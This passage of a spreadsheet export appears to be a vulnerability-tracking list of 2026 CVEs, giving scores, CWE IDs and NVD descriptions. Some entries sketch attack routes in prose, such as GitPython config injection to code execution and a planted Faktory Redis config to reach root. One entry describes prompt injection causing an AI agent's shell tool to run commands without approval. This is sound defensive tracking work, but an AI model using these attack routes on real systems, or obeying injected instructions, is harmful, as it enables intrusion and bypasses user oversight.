          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84003</t>
        </is>
      </c>
      <c r="C1165" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D1165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1165" s="5" t="inlineStr"/>
      <c r="F1165" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1165" s="5" t="inlineStr">
        <is>
          <t>microsoft, node.js</t>
        </is>
      </c>
      <c r="H1165" s="5" t="inlineStr"/>
      <c r="I1165" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1165" s="5" t="inlineStr"/>
      <c r="K1165" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="L1165" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass by capture-replay in Microsoft Authentication Library (MSAL) for Node.js allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M1165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84003</t>
        </is>
      </c>
    </row>
    <row r="1166">
      <c r="A1166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84366</t>
        </is>
      </c>
      <c r="C1166" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D1166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1166" s="5" t="inlineStr"/>
      <c r="F1166" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1166" s="5" t="inlineStr">
        <is>
          <t>python, aws</t>
        </is>
      </c>
      <c r="H1166" s="5" t="inlineStr"/>
      <c r="I1166" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1166" s="5" t="inlineStr"/>
      <c r="K1166" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="L1166" s="5" t="inlineStr">
        <is>
          <t>Scrapy is a high-level web crawling and scraping framework for Python. Prior to 2.17.0, in scrapy/core/downloader/handlers/s3.py, Scrapy's S3DownloadHandler converts an S3-scheme bucket and key request into a plaintext HTTP request to the corresponding S3 endpoint unless request.meta["is_secure"] is explicitly enabled, then signs and sends the plaintext request with configured AWS credentials. A network attacker who can observe traffic between Scrapy and S3 can read the bucket and key path, AWS Authorization header, X-Amz-Security-Token when temporary credentials are used, S3 object contents, and S3 response headers. An active man-in-the-middle attacker can also modify the plaintext S3 response body, status code, and headers before Scrapy processes them, causing scraped-data poisoning, poisoned exports, HTTP cache poisoning when caching is enabled, or influence over later crawl targets through forged redirects or attacker-controlled links. Users making S3-scheme requests with AWS credentials are affected. This issue is fixed in version 2.17.0.</t>
        </is>
      </c>
      <c r="M1166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84366</t>
        </is>
      </c>
    </row>
    <row r="1167">
      <c r="A1167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85525</t>
        </is>
      </c>
      <c r="C1167" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D1167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1167" s="5" t="inlineStr"/>
      <c r="F1167" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1167" s="5" t="inlineStr">
        <is>
          <t>node.js, python</t>
        </is>
      </c>
      <c r="H1167" s="5" t="inlineStr"/>
      <c r="I1167" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1167" s="5" t="inlineStr"/>
      <c r="K1167" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-347</t>
        </is>
      </c>
      <c r="L1167" s="5" t="inlineStr">
        <is>
          <t>Improper OCSP response validation in the Snowflake Python, Go, JDBC, and Node.js drivers allowed a revoked TLS certificate to be accepted as valid, because OCSP responses were not reliably bound to the certificate being validated and definitive verification failures were treated as transient. A man-in-the-middle attacker holding a revoked certificate and its private key for a Snowflake or stage hostname could cause the driver to establish a TLS session to the attacker-controlled endpoint anyway, allowing the attacker to read and modify data transmitted within that connection. Successful exploitation requires that on-path position and the corresponding private key, and impact is limited to data carried within the intercepted connection. The fix is available in Snowflake Connector for Python v4.7.3, Snowflake Go Driver v2.2.0, Snowflake JDBC Driver v4.3.4 (including the snowflake-jdbc-fips and snowflake-jdbc-thin), and Snowflake Node.js Driver v3.3.0. Users must manually upgrade.</t>
        </is>
      </c>
      <c r="M1167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85525</t>
        </is>
      </c>
    </row>
    <row r="1168">
      <c r="A1168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87812</t>
        </is>
      </c>
      <c r="C1168" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D1168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1168" s="5" t="inlineStr"/>
      <c r="F1168" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1168" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1168" s="5" t="inlineStr"/>
      <c r="I1168" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1168" s="5" t="inlineStr"/>
      <c r="K1168" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1168" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 contains a stored cross-site scripting vulnerability in Bazaar package cards where the iconURL metadata is inserted directly into HTML img src attributes without escaping. Attackers can inject malicious URLs with event handlers that execute JavaScript in the authenticated SiYuan origin when users view Bazaar listings, enabling API requests and application state manipulation.</t>
        </is>
      </c>
      <c r="M1168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87812</t>
        </is>
      </c>
    </row>
    <row r="1169">
      <c r="A1169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13201</t>
        </is>
      </c>
      <c r="C1169" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D1169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1169" s="5" t="inlineStr"/>
      <c r="F1169" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1169" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H1169" s="5" t="inlineStr">
        <is>
          <t>kubevirt:kubevirt, redhat:openshift_virtualization</t>
        </is>
      </c>
      <c r="I1169" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J1169" s="5" t="inlineStr"/>
      <c r="K1169" s="5" t="inlineStr">
        <is>
          <t>CWE-61</t>
        </is>
      </c>
      <c r="L1169" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in KubeVirt's safepath package used by virt-handler. The OpenAtNoFollow function uses O_PATH|O_NOFOLLOW to obtain a file descriptor to a path leaf, but downstream operations resolve the path via /proc/self/fd/N using link-following syscalls. When the leaf is a symlink, the kernel dereferences it, defeating the intended no-follow protection. An attacker with access to a virt-launcher pod can exploit this to redirect virt-handler's IPC socket connections, including the notify socket used for VM domain lifecycle events. By hijacking this socket, the attacker can inject arbitrary domain events into virt-handler, causing it to take incorrect lifecycle actions, corrupt VM state in the Kubernetes API, or crash — resulting in sustained denial of VM management services for all virtual machines on the affected node. Additionally, the same symlink following flaw allows virt-handler to apply file ownership or permission changes to unintended host paths.</t>
        </is>
      </c>
      <c r="M1169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13201</t>
        </is>
      </c>
    </row>
    <row r="1170">
      <c r="A1170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28613</t>
        </is>
      </c>
      <c r="C1170" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D1170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1170" s="5" t="inlineStr"/>
      <c r="F1170" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1170" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1170" s="5" t="inlineStr"/>
      <c r="I1170" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1170" s="5" t="inlineStr"/>
      <c r="K1170" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1170" s="5" t="inlineStr">
        <is>
          <t>In initAppLinkTypeAndIntent of ChannelImpl.java, there is a possible launch an arbitrary intent due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t>
        </is>
      </c>
      <c r="M1170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28613</t>
        </is>
      </c>
    </row>
    <row r="1171">
      <c r="A1171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28626</t>
        </is>
      </c>
      <c r="C1171" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D1171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1171" s="5" t="inlineStr"/>
      <c r="F1171" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1171" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1171" s="5" t="inlineStr"/>
      <c r="I1171" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1171" s="5" t="inlineStr"/>
      <c r="K1171" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L1171" s="5" t="inlineStr">
        <is>
          <t>In onCreate of SetupPassthroughActivity.java, there is a possible way to launch arbitrary activity due to Intent redirection . This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t>
        </is>
      </c>
      <c r="M1171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28626</t>
        </is>
      </c>
    </row>
    <row r="1172">
      <c r="A1172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28656</t>
        </is>
      </c>
      <c r="C1172" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D1172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1172" s="5" t="inlineStr"/>
      <c r="F1172" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1172" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1172" s="5" t="inlineStr"/>
      <c r="I1172" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1172" s="5" t="inlineStr"/>
      <c r="K1172" s="5" t="inlineStr">
        <is>
          <t>CWE-1021</t>
        </is>
      </c>
      <c r="L1172" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of DeviceAdminAdd.java, there is a possible way to an overlay due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t>
        </is>
      </c>
      <c r="M1172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28656</t>
        </is>
      </c>
    </row>
    <row r="1173">
      <c r="A1173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40542</t>
        </is>
      </c>
      <c r="C1173" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D1173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1173" s="5" t="inlineStr"/>
      <c r="F1173" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1173" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1173" s="5" t="inlineStr">
        <is>
          <t>apache:httpclient</t>
        </is>
      </c>
      <c r="I1173" s="5" t="inlineStr">
        <is>
          <t>2026-04-22</t>
        </is>
      </c>
      <c r="J1173" s="5" t="inlineStr"/>
      <c r="K1173" s="5" t="inlineStr">
        <is>
          <t>CWE-304, CWE-325</t>
        </is>
      </c>
      <c r="L1173" s="5" t="inlineStr">
        <is>
          <t>Missing critical step in authentication in Apache HttpClient 5.6 allows an attacker to cause the client to accept SCRAM-SHA-256 authentication without proper mutual authentication verification. Users are recommended to upgrade to version 5.6.1, which fixes this issue.</t>
        </is>
      </c>
      <c r="M1173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40542</t>
        </is>
      </c>
    </row>
    <row r="1174">
      <c r="A1174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41605</t>
        </is>
      </c>
      <c r="C1174" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D1174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1174" s="5" t="inlineStr"/>
      <c r="F1174" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1174" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1174" s="5" t="inlineStr">
        <is>
          <t>apache:thrift</t>
        </is>
      </c>
      <c r="I1174" s="5" t="inlineStr">
        <is>
          <t>2026-04-28</t>
        </is>
      </c>
      <c r="J1174" s="5" t="inlineStr"/>
      <c r="K1174" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1174" s="5" t="inlineStr">
        <is>
          <t>Integer Overflow or Wraparound vulnerability in Apache Thrift.
This issue affects Apache Thrift: before 0.23.0.
Users are recommended to upgrade to version 0.23.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M1174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41605</t>
        </is>
      </c>
    </row>
    <row r="1175">
      <c r="A1175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43869</t>
        </is>
      </c>
      <c r="C1175" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D1175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1175" s="5" t="inlineStr"/>
      <c r="F1175" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1175" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1175" s="5" t="inlineStr">
        <is>
          <t>apache:thrift</t>
        </is>
      </c>
      <c r="I1175" s="5" t="inlineStr">
        <is>
          <t>2026-05-05</t>
        </is>
      </c>
      <c r="J1175" s="5" t="inlineStr"/>
      <c r="K1175" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-297</t>
        </is>
      </c>
      <c r="L1175" s="5" t="inlineStr">
        <is>
          <t>Improper Validation of Certificate with Host Mismatch vulnerability in Apache Thrift.
This issue affects Apache Thrift: before 0.23.0.
Users are recommended to upgrade to version 0.23.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M1175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43869</t>
        </is>
      </c>
    </row>
    <row r="1176">
      <c r="A1176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44185</t>
        </is>
      </c>
      <c r="C1176" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D1176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1176" s="5" t="inlineStr"/>
      <c r="F1176" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1176" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1176" s="5" t="inlineStr">
        <is>
          <t>apache:http_server</t>
        </is>
      </c>
      <c r="I1176" s="5" t="inlineStr">
        <is>
          <t>2026-06-08</t>
        </is>
      </c>
      <c r="J1176" s="5" t="inlineStr"/>
      <c r="K1176" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-126</t>
        </is>
      </c>
      <c r="L1176" s="5" t="inlineStr">
        <is>
          <t>Buffer Over-read vulnerability in Apache HTTP Server via outbound OCSP requests to an attacker controlled OCSP server
This issue affects Apache HTTP Server: from 2.4.0 through 2.4.67.
Users are recommended to upgrade to version 2.4.68, which fixes the issue.</t>
        </is>
      </c>
      <c r="M1176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44185</t>
        </is>
      </c>
    </row>
    <row r="1177">
      <c r="A1177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45528</t>
        </is>
      </c>
      <c r="C1177" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D1177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1177" s="5" t="inlineStr"/>
      <c r="F1177" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1177" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1177" s="5" t="inlineStr"/>
      <c r="I1177" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1177" s="5" t="inlineStr"/>
      <c r="K1177" s="5" t="inlineStr">
        <is>
          <t>CWE-926</t>
        </is>
      </c>
      <c r="L1177" s="5" t="inlineStr">
        <is>
          <t>In getManageSpaceActivityIntent of StorageManagerService.java, there is a possible LaunchAnyWhere chain due to an unsafe PendingIntent. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t>
        </is>
      </c>
      <c r="M1177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45528</t>
        </is>
      </c>
    </row>
    <row r="1178">
      <c r="A1178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47878</t>
        </is>
      </c>
      <c r="C1178" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D1178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1178" s="5" t="inlineStr"/>
      <c r="F1178" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1178" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="H1178" s="5" t="inlineStr">
        <is>
          <t>broadcom:spring_batch</t>
        </is>
      </c>
      <c r="I1178" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J1178" s="5" t="inlineStr"/>
      <c r="K1178" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L1178" s="5" t="inlineStr">
        <is>
          <t>DefaultExecutionContextSerializer, used by default in Spring Batch's JDBC job repository, passes Base64-decoded bytes directly to ObjectInputStream.readObject() without an ObjectInputFilter that restricts types to a trusted class allowlist.
Spring Batch 6.0.0 - 6.0.4
Spring Batch 5.2.6 and earlier</t>
        </is>
      </c>
      <c r="M1178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47878</t>
        </is>
      </c>
    </row>
    <row r="1179">
      <c r="A1179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63404</t>
        </is>
      </c>
      <c r="C1179" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D1179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1179" s="5" t="inlineStr"/>
      <c r="F1179" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1179" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H1179" s="5" t="inlineStr"/>
      <c r="I1179" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1179" s="5" t="inlineStr"/>
      <c r="K1179" s="5" t="inlineStr">
        <is>
          <t>CWE-377</t>
        </is>
      </c>
      <c r="L1179" s="5" t="inlineStr">
        <is>
          <t>Faktory is a language-agnostic background job server. In versions prior to 1.10.0, the embedded Redis bootstrapper is vulnerable to an insecure temporary file flaw that lets a local unprivileged user hijack the Redis configuration and escalate to root. It writes its startup configuration to a fixed, predictable, world-writable path, /tmp/redis.conf, only creating the file if it does not already exist and never validating it on later boots. Because /tmp is world-writable, a local unprivileged user can pre-create /tmp/redis.conf with attacker-chosen Redis directives before Faktory starts, and Faktory will use the planted file verbatim. Faktory only overrides the unixsocket, dir, and logfile options, leaving directives such as bind, protected-mode, requirepass, and loadmodule attacker-controlled. This lets an attacker silently expose the entire job queue over an unauthenticated network port with no visible error to the administrator. Because the official systemd unit runs Faktory, and the redis-server child it spawns, as root, an attacker can also supply a loadmodule directive to execute arbitrary native code in the root-owned Redis process, escalating from a local unprivileged user to root. This issue is fixed in version 1.10.0.</t>
        </is>
      </c>
      <c r="M1179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63404</t>
        </is>
      </c>
    </row>
    <row r="1180">
      <c r="A1180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67326</t>
        </is>
      </c>
      <c r="C1180" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D1180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1180" s="5" t="inlineStr"/>
      <c r="F1180" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1180" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1180" s="5" t="inlineStr"/>
      <c r="I1180" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J1180" s="5" t="inlineStr"/>
      <c r="K1180" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1180" s="5" t="inlineStr">
        <is>
          <t>GitPython before 3.1.50 fails to validate newline characters in the section parameter of config_writer(), allowing attackers to inject arbitrary section headers into .git/config. Attackers can inject newlines to create a forged [core] section with hooksPath pointing to attacker-controlled directories, achieving remote code execution when git hooks are triggered.</t>
        </is>
      </c>
      <c r="M1180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67326</t>
        </is>
      </c>
    </row>
    <row r="1181">
      <c r="A1181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69097</t>
        </is>
      </c>
      <c r="C1181" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D1181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1181" s="5" t="inlineStr"/>
      <c r="F1181" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1181" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1181" s="5" t="inlineStr"/>
      <c r="I1181" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1181" s="5" t="inlineStr"/>
      <c r="K1181" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="L1181" s="5" t="inlineStr">
        <is>
          <t>GitPython before 3.1.53 fails to properly escape section names in git config files, allowing attackers to inject arbitrary configuration directives through malicious submodule names. Attackers can inject core.sshCommand or other dangerous config keys into the victim's .git/config via create_submodule or clone_from operations, achieving remote code execution when git performs ssh operations.</t>
        </is>
      </c>
      <c r="M1181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69097</t>
        </is>
      </c>
    </row>
    <row r="1182">
      <c r="A1182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69477</t>
        </is>
      </c>
      <c r="C1182" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D1182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1182" s="5" t="inlineStr"/>
      <c r="F1182" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1182" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1182" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:access, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1182" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1182" s="5" t="inlineStr"/>
      <c r="K1182" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1182" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Access allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M1182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69477</t>
        </is>
      </c>
    </row>
    <row r="1183">
      <c r="A1183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75857</t>
        </is>
      </c>
      <c r="C1183" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D1183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1183" s="5" t="inlineStr"/>
      <c r="F1183" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1183" s="5" t="inlineStr">
        <is>
          <t>python, mysql</t>
        </is>
      </c>
      <c r="H1183" s="5" t="inlineStr"/>
      <c r="I1183" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1183" s="5" t="inlineStr"/>
      <c r="K1183" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L1183" s="5" t="inlineStr">
        <is>
          <t>CodeWhale versions &gt;= 0.8.41 and &lt; 0.8.64 contain a vulnerability in the exec_shell_interact (alias exec_interact) tool, whose approval_requirement returns ApprovalRequirement::Auto. This overrides the default Required approval for code-executing tools, so LLM-controlled stdin is written into an already-approved long-running interactive shell (e.g., a python3 -i REPL, mysql, ssh, or sudo -i session) without any approval prompt. An attacker who can inject instructions via untrusted content the agent ingests (a fetched page, MCP result, or repo file) can cause commands to run at the privilege level of that approved process. Fixed in 0.8.64.</t>
        </is>
      </c>
      <c r="M1183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75857</t>
        </is>
      </c>
    </row>
    <row r="1184">
      <c r="A1184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78627</t>
        </is>
      </c>
      <c r="C1184" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D1184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1184" s="5" t="inlineStr"/>
      <c r="F1184" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1184" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H1184" s="5" t="inlineStr"/>
      <c r="I1184" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1184" s="5" t="inlineStr"/>
      <c r="K1184" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L1184" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M1184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78627</t>
        </is>
      </c>
    </row>
    <row r="1185">
      <c r="A1185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85028</t>
        </is>
      </c>
      <c r="C1185" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D1185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1185" s="5" t="inlineStr"/>
